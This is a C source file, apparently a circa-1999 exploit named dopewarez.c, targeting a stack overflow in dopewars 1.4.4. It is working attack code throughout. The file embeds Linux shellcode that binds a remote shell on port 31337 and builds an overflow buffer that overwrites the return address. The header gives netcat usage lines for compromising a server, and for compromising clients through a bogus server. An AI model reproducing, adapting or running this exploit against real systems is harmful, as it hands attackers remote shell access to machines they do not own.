/*
 * dopewarez.c - Exploit for dopewars-1.4.4 client/server. Produces a shell.
 *
 * URL: http://bellatrix.pcl.ox.ac.uk/~ben/dopewars/
 *
 * C0de by nuuB [Sep 25, 1999]. Linux version.
 *
 * 0wn a server:
 *
 *  (dopewarez [<offset>] | nc <server> 7902)& ; sleep 5 ; nc <server> 31337
 *
 * 0wn a client using a bogus server:
 *
 *  (dopewarez 2285 | nc -l -p 7902) & ; wait4client ; nc <client> 31337
 *
 * Overflow occurs in ProcessMessage().
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>

#define EGGSIZE       598
#define EIP_OFFSET    208
#define FIRST_OFFSET  236

#define WRD_STACK_OFFSET 0x0bb0           /* approximate for server */

#define OWNED_FIRST  0xbffffffc-132   /* 132 = offset for Player->next */

#define C0DE_SIZE    213

char c0de[]="\xbc\xfc\xff\xff\xbf\xeb\x02\xeb\x0c\xe8\xf9\xff\xff\xff\x2f\x62"
            "\x69\x6e\x2f\x73\x68\x5d\x31\xc0\x89\xc3\x89\xc1\xb0\x46\xcd\x80"
            "\x31\xc9\x51\x41\x51\x41\x51\x89\xe1\x31\xdb\x43\x31\xc0\x04\x66"
            "\xcd\x80\x8d\x64\x24\x0c\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\x7a"
            "\x69\x04\x02\x66\x50\x89\xe3\x31\xc0\x04\x10\x50\x53\x57\x89\xe1"
            "\x31\xdb\xb3\x02\x31\xc0\x04\x66\xcd\x80\x85\xc0\x75\x6f\x8d\x64"
            "\x24\x1c\x31\xc0\x50\x57\x89\xe1\x31\xdb\xb3\x04\x31\xc0\x04\x66"
            "\xcd\x80\x8d\x64\x24\x08\x31\xc0\x04\x10\x50\x89\xe3\x8d\x64\x24"
            "\xf0\x89\xe1\x53\x51\x57\x89\xe1\x31\xdb\xb3\x05\x31\xc0\x04\x66"
            "\xcd\x80\x8d\x64\x24\x20\x89\xc7\x89\xfb\x31\xc9\xb0\x3f\xcd\x80"
            "\x89\xfb\x31\xc9\x41\xb0\x3f\xcd\x80\x89\xfb\x31\xc9\x80\xc1\x02"
            "\xb0\x3f\xcd\x80\x31\xc0\x88\x45\x07\x89\x6d\x08\x89\x45\x0c\x8d"
            "\x55\x0c\x8d\x4d\x08\x89\xeb\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x31"
            "\xc0\xb0\x01\xcd\x80";

char egg[EGGSIZE+1];

void bail(char *s)
{
  puts(s);
  exit(1);
}

char *htol_LEstr(unsigned long num)
{
  static unsigned char buf[5];
  unsigned long n;

  n=htonl(num);
  buf[0]=(n>>24)&0xff;
  buf[1]=(n>>16)&0xff;
  buf[2]=(n>>8)&0xff;
  buf[3]=n&0xff;
  buf[4]=0;

  if(strlen(buf) != 4) bail("NULL detected!");
  if(strchr(buf, '^')) bail("caret detected!");

  return buf;
}

int main(int argc, char *argv[])
{
  unsigned long eip;

  /* Try to land splat in the middle of the NOPs after FIRST_OFFSET */
  eip=(unsigned long)((char *)&eip-WRD_STACK_OFFSET);
  eip+=FIRST_OFFSET+4+(EGGSIZE-2-FIRST_OFFSET-4-C0DE_SIZE)/2;
  if(argc >= 2)
    {
      if(!strncmp("0x", argv[1], 2)) /* Absolute */
        eip=strtoul(argv[1], 0, 0);
      else
        eip+=atoi(argv[1]);
    }
  fprintf(stderr, "Using EIP=0x%08x\n", eip);
  memset(egg, 'A', EGGSIZE);
  strncpy(egg+EIP_OFFSET-2, "\xeb\x04", 2);
  strncpy(egg+EIP_OFFSET, htol_LEstr(eip), 4);
  strncpy(egg+FIRST_OFFSET-2, "\xeb\x04", 2);
  strncpy(egg+FIRST_OFFSET, htol_LEstr(OWNED_FIRST), 4);
  memcpy(egg+EGGSIZE-2-C0DE_SIZE, c0de, C0DE_SIZE);
  strcpy(egg+EGGSIZE-2, "^\n");

  printf("%s", egg);
  return 0;
}
/*                    www.hack.co.za              [2000]*/